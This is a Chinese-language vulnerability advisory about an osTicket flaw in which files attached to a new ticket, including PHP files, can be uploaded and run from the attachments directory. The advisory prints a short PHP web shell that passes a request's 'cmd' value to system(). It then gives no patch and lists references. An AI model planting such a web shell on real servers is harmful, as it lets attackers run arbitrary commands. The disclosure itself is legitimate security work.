osTicket New Ticket附件远程命令执行漏洞

漏洞信息详情

osTicket New Ticket附件远程命令执行漏洞

漏洞简介

osTicket是一款基于WEB的客户服务管理程序。
osTicket的上传功能实现存在问题,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
用户建立一个新的ticket,然后以这个ticket上传一个文件,就可以用以下方式访问:
www.example.com/osticket/attachments/
如果用户上传的PHP文档包含如下内容:
<?PHP
echo \”<form action = \’\’\’\’><input type = \’\’text\’\’ name = \’\’cmd\’\’ value = \’\’$cmd\’\’ size = \’\’75\’\’><BR>\”;
if (!$cmd)die;
system($cmd);
?>
就可以点击脚本在服务器上运行命令。

漏洞公告

厂商补丁:
osTicket
——–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.osticket.com/” target=”_blank”>
http://www.osticket.com/

参考网址

来源: BID
名称: 10586
链接:http://www.securityfocus.com/bid/10586

来源: BUGTRAQ
名称: 20040621 Multiple osTicket exploits!
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108786779500957&w=2

来源: XF
名称: osticket-view-attachments(16478)
链接:http://xforce.iss.net/xforce/xfdb/16478

来源: XF
名称: osticket-php-file-upload(16477)
链接:http://xforce.iss.net/xforce/xfdb/16477

来源: XF
名称: osticket-php-file-upload(16477)
链接:http://xforce.iss.net/xforce/xfdb/16477

受影响实体

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享